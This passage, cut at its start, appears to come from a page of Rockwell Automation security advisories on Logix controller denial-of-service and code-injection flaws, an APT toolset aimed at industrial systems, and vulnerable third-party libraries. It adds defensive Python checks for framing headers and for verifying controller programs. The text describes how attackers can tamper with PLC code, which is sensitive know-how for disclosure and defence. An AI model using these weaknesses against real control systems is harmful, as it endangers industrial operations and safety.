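    """Split a raw HTTP/1.x response into a header map (names lower-cased).

    Repeated headers are kept as a list; the body, if any, is ignored.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    headers: dict[str, list[str]] = {}
    for line in head.split("\r\n")[1:]:          # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def assess_framing_protection(raw_response: str) -> dict:
    """Report whether the response can be framed by a third-party page."""
    headers = parse_response_headers(raw_response)

    xfo_values = [v.upper() for v in headers.get("x-frame-options", [])]
    # A single, well-known value is required; duplicates or unknown values
    # are treated as absent, which is how browsers behave.
    xfo_ok = len(set(xfo_values)) == 1 and xfo_values[0] in VALID_XFO

    frame_ancestors = []
    for policy in headers.get("content-security-policy", []):
        for directive in policy.split(";"):
            directive = directive.strip()
            if directive.lower().startswith("frame-ancestors"):
                frame_ancestors.append(directive)
    csp_ok = bool(frame_ancestors)

    if xfo_ok or csp_ok:
        finding = "protected against framing"
    elif xfo_values:
        finding = "X-Frame-Options present but value is not DENY or SAMEORIGIN"
    else:
        finding = "no X-Frame-Options or CSP frame-ancestors header (CVE-2022-2179 condition)"

    return {
        "x_frame_options": xfo_values,
        "frame_ancestors": frame_ancestors,
        "protected": xfo_ok or csp_ok,
        "finding": finding,
    }


# Constructed sample responses (not captures from a real device).
UNPROTECTED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: embedded-httpd\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>Device status</body></html>"
)
PROTECTED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: embedded-httpd\r\n"
    "X-Frame-Options: DENY\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)
CSP_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for name, raw in (("unprotected", UNPROTECTED_RESPONSE),
                      ("x-frame-options", PROTECTED_RESPONSE),
                      ("csp", CSP_RESPONSE)):
        print(name, "->", assess_framing_protection(raw)["finding"])
```

Because the web server on these controllers cannot be patched to add the header, the check is most useful for verifying that the advisory's mitigations are in effect: if the web server is disabled or port 80 is blocked at the firewall, no response is obtainable at all, which is the desired outcome.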

References

  • CVE-2022-2179

Medium
PN1596 | PN1596 | Logix Controllers Vulnerable to Denial-of-Service Attack
Published Date:
June 17, 2022
Last Updated:
June 17, 2022
CVE IDs:
CVE-2022-1797
Products:
1769 Compact GuardLogix 5370, 1756/5069 GuardLogix, 1768/1769/5069 CompactLogix, 1756 ControlLogix
CVSS Scores:
6.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number: 1.4
Version 1.0 – May 24, 2022
Version 1.1 – June 3, 2022 Updated suggested actions and removed versions for clarity
Version 1.2 – June 17, 2022 Clarified vulnerability details and updated risk mitigation section
Version 1.3 – July 8th, 2022 Updated risk mitigation section
Version 1.4 – July 17th, 2023 Updated risk mitigation section

Executive Summary

Rockwell Automation was made aware of a vulnerability within our Logix controllers. This vulnerability may allow an unauthorized user to send malicious messages to the targeted device, which could potentially lead to a denial-of-service.

Customers using affected versions of this software are encouraged to evaluate the following mitigations provided and apply them to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided in this security advisory.

Affected Products

  • CompactLogix™ 5380 controllers
  • Compact GuardLogix® 5380 controllers
  • CompactLogix 5480 controllers
  • ControlLogix® 5580 controllers
  • GuardLogix 5580 controllers
  • CompactLogix 5370 controllers
  • Compact GuardLogix 5370 controllers
  • ControlLogix 5570 controllers
  • GuardLogix 5570 controllers

Vulnerability Details

CVE-2022-1797 Rockwell Automation Logix controllers are vulnerable to denial-of-service attack
A vulnerability that exists in the Logix controller may allow an attacker to modify a message instruction control structure that could cause a denial-of-service condition due to a major nonrecoverable fault. If the controller experiences a major nonrecoverable fault, a user will have to clear the fault and redownload the user project file to bring the device back online and continue normal operations.

CVSS v3.1 Base Score: 6.8/10 [MEDIUM]
CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

Customers can apply either mitigation A or B to address this vulnerability. Customers are directed towards the risk mitigation provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Products Affected: CompactLogix 5380, Compact GuardLogix 5380, CompactLogix 5480, ControlLogix 5580, GuardLogix 5580
Version Affected: Versions prior to 32.016
Suggested Actions:
  • Mitigation A: Customers should upgrade to version 32.016 firmware or later to mitigate this issue.
  • Mitigation B: Set the message control structure access to read-only. Instructions are in Chapter 4 of Logix 5000™ Controllers I/O and Tag Data Programming Manual, publication 1756-PM004.

Products Affected: CompactLogix 5370, Compact GuardLogix 5370, ControlLogix 5570, GuardLogix 5570
Version Affected: Versions prior to 33.016
Suggested Actions:
  • Mitigation A: Customers should upgrade to version 33.016 firmware or later to mitigate this issue.
  • Mitigation B: Set the message control structure access to read-only. Instructions are in Chapter 4 of Logix 5000™ Controllers I/O and Tag Data Programming Manual, publication 1756-PM004.

Products Affected: ControlLogix 5570 Redundancy
Version Affected: Versions prior to 33.053
Suggested Actions:
  • Mitigation A: Customers should upgrade to version 33.053 firmware or later to mitigate this issue.
  • Mitigation B: Set the message control structure access to read-only. Instructions are in Chapter 4 of Logix 5000™ Controllers I/O and Tag Data Programming Manual, publication 1756-PM004.


If applying mitigation A or B is not possible, customers should consider implementing the following solutions:
  • Use of Microsoft® AppLocker or other similar allow list applications can help mitigate risk. Information on using AppLocker with products from Rockwell Automation is available at Knowledgebase article QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, see Knowledgebase article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation, and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • CVE-2022-1797

Critical
PN1585 | PN1585 | Logix Controllers May Allow for Unauthorized Code Injection
Published Date:
May 06, 2022
Last Updated:
May 06, 2022
CVE IDs:
CVE-2021-22681, CVE-2022-1161
Products:
5069 Compact GuardLogix 5380, 1769 CompactLogix Controllers, 1769 CompactLogix 5370, 1756/5069 GuardLogix, 1768 CompactLogix Controllers, ControlLogix Hardware
CVSS Scores:
10.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.2 – May 06, 2022 Updated vulnerability details and risk mitigations

Detailed Information

Claroty, a cybersecurity technology vendor and partner of Rockwell Automation, disclosed a vulnerability in Logix Controllers to Rockwell Automation. Claroty found that some Logix Controllers may allow an attacker, with the ability to modify user programs, to download a user program containing malicious code that would be undetectable to the user. This vulnerability was found by Sharon Brizinov and Tal Keren of Claroty, and they have provided a blog post with more details located here.

An attacker could gain the ability to modify user programs by leveraging a previously disclosed vulnerability (“Authentication Bypass Vulnerability Found in Logix Controllers”), whereby a private key was discovered that could allow Logix Controllers communicating over the unauthenticated version of EtherNet/IP™ to accept communications that do not originate from Studio 5000 Logix Designer® software.

Affected Products

  • 1768 CompactLogix™ controllers
  • 1769 CompactLogix controllers
  • CompactLogix 5370 controllers
  • CompactLogix 5380 controllers
  • CompactLogix 5480 controllers
  • Compact GuardLogix® 5370 controllers
  • Compact GuardLogix 5380 controllers
  • ControlLogix® 5550 controllers
  • ControlLogix 5560 controllers
  • ControlLogix 5570 controllers
  • ControlLogix 5580 controllers
  • GuardLogix 5560 controllers
  • GuardLogix 5570 controllers
  • GuardLogix 5580 controllers
  • FlexLogix™ 1794-L34 controllers
  • DriveLogix™5730 controllers
  • SoftLogix™ 5800 controllers

Vulnerability Details

[CVE-2022-1161]: Modification of PLC Program Code

An attacker with the ability to modify a user program may change user program code on some ControlLogix, CompactLogix, and GuardLogix control systems. Studio 5000 Logix Designer writes the user-readable program code to a separate location from the executed compiled code, allowing an attacker to change one and not the other. Additionally, devices communicating over the unauthenticated version of EtherNet/IP may be vulnerable to attacks from custom clients exploiting CVE-2021-22681.

CVSS v3.1 Base Score: 10.0/CRITICAL
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

The following types of code are affected by this vulnerability, indicated by an X:

Product                    Structured Text (ST)   Ladder Diagrams (LD)   Function Block Diagram (FBD)   Sequential Function Chart (SFC)   Add-On Instructions (AOI)
1768 CompactLogix          X                      Not affected           X                              X                                 X
1769 CompactLogix          X                      Not affected           X                              X                                 X
CompactLogix 5370          X                      Not affected           X                              X                                 X
CompactLogix 5380          X                      X                      X                              X                                 X
CompactLogix 5480          X                      X                      X                              X                                 X
Compact GuardLogix 5370    X                      Not affected           X                              X                                 X
Compact GuardLogix 5380    X                      X                      X                              X                                 X
ControlLogix 5550          X                      Not affected           X                              X                                 X
ControlLogix 5560          X                      Not affected           X                              X                                 X
ControlLogix 5570          X                      Not affected           X                              X                                 X
ControlLogix 5580          X                      X                      X                              X                                 X
GuardLogix 5560            X                      Not affected           X                              X                                 X
GuardLogix 5570            X                      Not affected           X                              X                                 X
GuardLogix 5580            X                      X                      X                              X                                 X
FlexLogix 1794-L34         X                      Not affected           X                              X                                 X
DriveLogix 5730            X                      Not affected           X                              X                                 X
SoftLogix 5800             X                      Not affected           X                              X                                 X

Risk Mitigation & User Action

We recommend that customers using the affected products listed below apply both Risk Mitigations A and B, if possible. Additionally, customers are advised to implement Risk Mitigation B as a long-term mitigation action and to increase the overall security posture of their environment. Furthermore, we encourage customers to apply general security guidelines in addition to the risk mitigations for a comprehensive defense-in-depth strategy.

Product Family: ControlLogix 5570, ControlLogix 5580, GuardLogix 5570, GuardLogix 5580, CompactLogix 5380, Compact GuardLogix 5380
Risk Mitigation and Recommended User Actions:

Risk Mitigation A:
  • Recompile and download user program code (i.e., acd) using an uncompromised workstation
  • Put controller mode switch into Run position
If keeping controller mode switch in Run is impractical, use the following mitigation:
  • Recompile and download user program code (i.e., acd) using an uncompromised workstation
  • Monitor controller change log for any unexpected modifications or anomalous activity
  • Utilize the Controller Log feature
  • Utilize Change Detection in the Logix Designer Application
  • If available, use the functionality in FactoryTalk AssetCentre software to detect changes

Risk Mitigation B:
Implement CIP Security™ to help prevent unauthorized connections when properly deployed. Supported controllers and communications modules include:
  • ControlLogix 5580 processors using on-board EtherNet/IP port
  • GuardLogix 5580 processors using on-board EtherNet/IP port
  • ControlLogix 5580 processors operating in High Availability (HA) configurations using 1756-EN4TR modules
  • ControlLogix 5560, ControlLogix 5570, ControlLogix 5580, GuardLogix 5570 and GuardLogix 5580 can use a 1756-EN4TR ControlLogix EtherNet/IP™ module
  • If using a 1756-EN2T, then replace with a 1756-EN4TR
  • CompactLogix 5380 using on-board EtherNet/IP port
  • Compact GuardLogix 5380 using on-board EtherNet/IP port

We recommend that customers using the affected products listed below apply Risk Mitigation A. We encourage customers to apply general security guidelines in addition to the risk mitigations for a comprehensive defense-in-depth strategy.
Product Family: 1768 CompactLogix, 1769 CompactLogix, CompactLogix 5370, CompactLogix 5480, ControlLogix 5560, GuardLogix 5560
Risk Mitigation and Recommended User Actions:

Risk Mitigation A:
  • Recompile and download user program code (i.e., acd)
  • Put controller mode switch into Run position

If keeping controller mode switch in Run is impractical, then use the following mitigation:
  • Recompile and download user program code (i.e., acd)
  • Monitor controller change log for any unexpected modifications or anomalous activity
  • Use the Controller Log feature
  • Use Change Detection in the Logix Designer application
  • If available, use the functionality in FactoryTalk AssetCentre to detect changes

In addition to applying risk mitigations, customers should also use the detection tools listed below to identify whether this vulnerability has been exploited in their environment.

Exploitation Detection Method:

The detection method can be used to determine if the user program residing in the controller is identical to what was downloaded. After upgrading to V34, this user program verification can be done via two methods:
  • On-demand using the online feature of the Logix Designer Compare Tool V9 or later. Details on how to utilize user program verification to discover if this vulnerability has been exploited can be found at Logix Designer Compare Tool User Manual, pages 19-20.
  • Schedule user program verification on FactoryTalk® AssetCentre V12 or later (Available Fall 2022).
Notes:
  • The user program comparison must be performed using the online compare tool feature from an uncompromised workstation.
  • Customers are directed to upgrade to Studio 5000® V34 software, or later, and the corresponding firmware versions for the Logix 5580, 5380, 5480, GuardLogix 5580 and Compact GuardLogix 5380. Review your controllers’ user manual to determine the required controller firmware version.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Consult the product documentation for specific features, such as a hardware keyswitch setting, which may be used to block unauthorized changes.
  • Block all traffic to EtherNet/IP or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Confirm that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

Social Engineering Mitigation Strategies
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see Rockwell Automation Publication System Security Design Guidelines Reference Manual.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).
Please direct all media inquiries to Marci Pelzer (MPelzer@rockwellautomation.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index.
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • NVD - CVE-2022-1161 (nist.gov)

High
PN1586 | PN1586 | Logix Designer Application May Allow Unauthorized Controller Code Injection
Published Date:
May 06, 2022
Last Updated:
May 06, 2022
CVE IDs:
CVE-2022-1159
Products:
RSLogix 5000 / Studio 5000 Logix Designer
CVSS Scores:
7.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – March 31, 2022
Version 1.1 – May 06, 2022 – Updated vulnerability details and mitigations

Detailed Information

Claroty, a cybersecurity technology vendor and partner of Rockwell Automation, disclosed a vulnerability in Studio 5000 Logix Designer® software which impacts some Logix controllers. Claroty found that the Logix Designer application could allow an unauthorized third party to inject controller code using a compromised workstation where the third party has gained administrative access. This could allow a third party to download the modified program to the controller and potentially allow for arbitrary code execution on the controller in a way that would potentially be undetectable to a user. This vulnerability was found by Sharon Brizinov and Tal Keren of Claroty, and they have provided a blog post with more details located here.

Affected Products

Studio 5000 Logix Designer application v28 and later, and the following Logix controllers running these versions:
  • ControlLogix® 5580 controllers
  • GuardLogix® 5580 controllers
  • CompactLogix™ 5380 controllers
  • CompactLogix 5480 controllers
  • Compact GuardLogix 5380 controllers

Vulnerability Details

[CVE-2022-1159]: Modification of PLC Program Code
Studio 5000 Logix Designer compiles the user program on the workstation. This compilation process prepares the Logix Designer application user program for download to a Logix controller. To successfully exploit this vulnerability, an attacker must first gain administrator access to the workstation running Studio 5000 Logix Designer. The attacker can then intercept the compilation process and inject code into the user program. The user may potentially be unaware that this modification has taken place.

This exploit could also allow modification of source key protected content and license source protected content. Changes to the content may not be noticeable to the user. Additionally, exploitation could affect safety tasks if unlocked and signature unprotected at the time of the attack. A locked and signature protected safety task would not be impacted.

CVSS v3.1 Base Score: 7.7/HIGH
CVSS Vector: AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

There is no long-term mitigation for this vulnerability. Customers using the affected hardware and software are directed to apply compensating controls and utilize detection capabilities, which are both listed below. Additionally, we recommend implementing general security guidelines for a comprehensive defense in depth strategy.

Compensating Controls:

  • Apply the Windows Hardening Guidance found in QA63609 - Recommended guidelines for hardening software, computer, device, and network systems and infrastructure (CIS Benchmarks) to help minimize risk of the vulnerability.
  • Secure workstations by referencing the Rockwell Automation Configure System Security Features publication SECURE-UM001A. This publication also describes how to detect attempts to exploit this vulnerability on a compromised workstation using Windows® security audit features (see page 51).

Exploitation Detection Method:

The detection method can be used to determine if the user program residing in the controller is identical to what was downloaded. After upgrading to V34, this user program verification can be done via two methods:
  • On-demand using the online feature of the Logix Designer Compare Tool V9 or later. Details on how to utilize user program verification to discover if this vulnerability has been exploited can be found at Logix Designer application Compare Tool User Manual publication LDCT-UM001C, pages 19-20.
  • Schedule user program verification on FactoryTalk® AssetCentre V12 or later (Available Fall 2022).
Notes:
  • The user program comparison must be performed using the online compare tool feature from an uncompromised workstation.
  • Customers are directed to upgrade to Studio 5000® V34 software, or later, and the corresponding firmware versions for the Logix 5580, 5380, 5480, GuardLogix 5580 and Compact GuardLogix 5380. Review your controllers’ user manual to determine the required controller firmware version.
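The detection method above, and the same method given for CVE-2022-1161 in PN1585, both rest on one idea: the program actually held by the controller must be compared, from an uncompromised workstation, with what was intended to be downloaded. The following is an added illustrative model of that check; it is not the Logix Designer Compare Tool, FactoryTalk AssetCentre, or the .acd format. A controller image is modelled as two separately stored artifacts, the readable source and the compiled code (the separation described for CVE-2022-1161), and "compilation" is a deterministic hash of the canonical source standing in for the real toolchain. The instruction strings are constructed for the example.

```python
"""Model of user-program verification against a trusted baseline (added example)."""
from __future__ import annotations

import hashlib
import json
from dataclasses import dataclass


def trusted_compile(source: list[str]) -> bytes:
    """Stand-in for compilation on an uncompromised workstation.

    Deterministic: identical canonical source always yields identical bytes,
    which is the property an online compare relies on.  Assumption of this
    model; a real toolchain's output is compared by the vendor tool instead.
    """
    canonical = json.dumps([line.strip() for line in source], separators=(",", ":"))
    return hashlib.sha256(canonical.encode()).digest()


@dataclass
class ControllerImage:
    """What the controller stores: readable source and executed code, separately."""
    source: list[str]
    compiled: bytes


@dataclass
class Baseline:
    """Digests recorded at download time from an uncompromised workstation."""
    source_digest: str
    compiled_digest: str


def digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def record_baseline(source: list[str]) -> tuple[ControllerImage, Baseline]:
    """Compile on a trusted workstation, download, and keep digests for later checks."""
    compiled = trusted_compile(source)
    image = ControllerImage(source=list(source), compiled=compiled)
    baseline = Baseline(
        source_digest=digest(json.dumps(source).encode()),
        compiled_digest=digest(compiled),
    )
    return image, baseline


def verify_image(image: ControllerImage, baseline: Baseline) -> dict[str, bool]:
    """Online compare: does the controller hold what was downloaded?

    'compiled_matches_source' is the check a source-only review cannot make:
    it rebuilds the compiled code from the source now on the controller and
    compares it with the code the controller executes.
    """
    source_ok = digest(json.dumps(image.source).encode()) == baseline.source_digest
    compiled_ok = digest(image.compiled) == baseline.compiled_digest
    consistent = trusted_compile(image.source) == image.compiled
    return {
        "source_matches_baseline": source_ok,
        "compiled_matches_baseline": compiled_ok,
        "compiled_matches_source": consistent,
        "trusted": source_ok and compiled_ok and consistent,
    }


def demonstrate() -> dict[str, dict[str, bool]]:
    """Three constructed cases: intact, compiled-only change, consistent re-edit."""
    source = ["XIC Start_PB", "OTE Motor_Run"]            # constructed rungs
    image, baseline = record_baseline(source)

    # Readable source untouched, executed code differs (CVE-2022-1161 pattern,
    # or code injected during compilation as in CVE-2022-1159).
    compiled_only = ControllerImage(source=list(source), compiled=b"\x00" * 32)

    # Both artifacts changed consistently: caught by the recorded source digest.
    edited = ["XIC Start_PB", "OTE Pump_Run"]
    consistent_edit = ControllerImage(source=edited, compiled=trusted_compile(edited))

    return {
        "intact": verify_image(image, baseline),
        "compiled_only_changed": verify_image(compiled_only, baseline),
        "consistent_edit": verify_image(consistent_edit, baseline),
    }


if __name__ == "__main__":
    for case, result in demonstrate().items():
        print(f"{case}: trusted={result['trusted']} {result}")
```

The point the model makes is why the advisories insist on an uncompromised workstation: the baseline and the recompilation are only meaningful if the toolchain producing them is itself trusted, and a review that looks only at the readable source passes in the first tampered case.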

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Consult the product documentation for specific features, such as a hardware keyswitch setting, which may be used to block unauthorized changes.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.
Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.
Social Engineering Mitigation Strategies
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see the Rockwell Automation publication number SECURE-RM001 “System Security Design Guidelines Reference Manual”.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).
Please direct all media inquiries to Marci Pelzer (MPelzer@rockwellautomation.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index.
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • CVE-2022-1159

PN1594 | PN1594 | APT Cyber Tools Targeting ICS/SCADA Devices (PIPEDREAM/INCONTROLLER)
Published Date:
May 06, 2022
Last Updated:
May 06, 2022
Products:
FactoryTalk Linx Gateway
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – May 6, 2022

Executive Summary

On April 13, 2022, researchers announced a new set of tools developed by an Advanced Persistent Threat (APT) group. This set of tools allows threat actors to attack specific ICS and OT hardware and software. Rockwell Automation is providing this advisory to notify customers of our response to this threat.

We are diligently working through our process to evaluate the threat and provide security mitigations as needed. Rockwell Automation recommends that customers apply hardening techniques, in addition to security best practices for a comprehensive defense in depth approach.

Affected Products

We are aware that the tool set contains modules that target OPC UA servers, CODESYS runtimes, and ASRock drivers. After evaluation, Rockwell Automation is aware that the products, listed below, use one of the targeted components. This list may be updated if more products are identified.

Products that use OPC UA servers:
  • FactoryTalk® Linx Gateway
    • Editions include embedded, basic, standard, extended distributed, professional
    • Versions include 6.10, 6.11, 6.20, 6.21 and 6.30

Risk Mitigation & User Action

We recommend the following compensating controls for customers using Rockwell Automation products that use the targeted hardware and software:
  • Disable anonymous authentication and configure the use of FactoryTalk Security using the following guidance from the FactoryTalk Linx Gateway Getting Results Guide, publication FTLG-GR001E:
    • Chapter 4 - UA Server Endpoints - Endpoint Properties
    • Appendix D - Secure FactoryTalk Linx Gateway using FactoryTalk Security
  • Enforce a lockout threshold for failed authentication attempts and configure audit logs to detect signs of an attack, using the following guidance from the FactoryTalk Security System Configuration Guide, publication FTSEC-QS001R, Chapter 9:
    • Set system policies - Account Policy Settings
    • Set audit policies - Monitor security-related events

General Security Guidelines

Refer to the Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Industrial Security Services website for information on security services from Rockwell Automation to assess, help protect, detect, respond, and recover from incidents. These services include assessments, designs, implementations, industrial anomaly detection, patch management, and remote infrastructure monitoring and administration.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation in PN1354 – Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

If you have questions regarding this notice, please send an email to our product security inbox at: PSIRT@rockwellautomation.com

Additional Links

  • PN1354 – Industrial Security Advisory Index
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • https://www.cisa.gov/uscert/ncas/alerts/aa22-103a

PN1592 | PN1592 | Vulnerable Third-Party Components in FactoryTalk® ProductionCentre
Published Date:
May 04, 2022
Last Updated:
May 04, 2022
Products:
FactoryTalk ProductionCentre
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – May 4, 2022

Executive Summary

Rockwell Automation discovered multiple vulnerabilities affecting third-party software used by our FactoryTalk® ProductionCentre (FTPC) products. If exploited, these vulnerabilities could have various effects, including, but not limited to, remote code execution, information disclosure, and denial of service on FTPC products.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerabilities, including products in scope and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk® ProductionCentre v10.04 and earlier

Vulnerability Details

As part of our commitment to security, Rockwell performs routine testing and vulnerability scanning to maintain the security posture of its products. Through open-source vulnerability scanning, we were made aware that third-party components utilized within our FTPC products contain vulnerabilities ranging from low to high severity. The third-party components and the versions in use are listed below.
  • Apache ActiveMQ Version 5.15.0
  • Apache Common BeanUtils Version 1.9.0
  • Apache CXF Version 3.1.10
  • Apache Http Client Version 4.5.2
  • Apache Santuario (Java) 2.0.8
  • Apache Xalan (Java) Version 2.7.1
  • Apache Xerces2J Version 2.11.0.SP5
  • Bouncy Castle Versions 1.36, 1.44, 1.55
  • Cryptacular Version 1.51
  • Codehaus XFire Version 0.9.5.2
  • Dom4J Version 1.61
  • Hibernate ORM Version 3.3.2
  • Jackson Databind Version 2.1.4
  • JasperReports Library Version 6.2.0
  • Java Platform Standard Edition Version 8u181
  • JBoss Remoting Version 4.0.22.Final
  • JGroups Version 2.12.2 Final
  • Spring Framework Versions 2.5.5, 4.3.8-4.3.9
  • Undertow Core Version 1.0.10.Final
  • Velocity.apache.org Version 1.7

Risk Mitigation & User Action

Customers using the affected software are encouraged to implement the risk mitigations below to minimize the risk of vulnerabilities. We encourage customers to combine the risk mitigations with security best practices to deploy a defense-in-depth strategy.
  • Apply security recommendations found in the FactoryTalk® ProductionCentre Knowledgebase Article IN39626 - Security Recommendations for FactoryTalk ProductionCentre to help minimize the risk of these third-party vulnerabilities.
  • Deploy network segmentation, when possible, per our standard deployment recommendations.

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, see Knowledgebase Article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also, recognize that a VPN is only as secure as the connected devices.
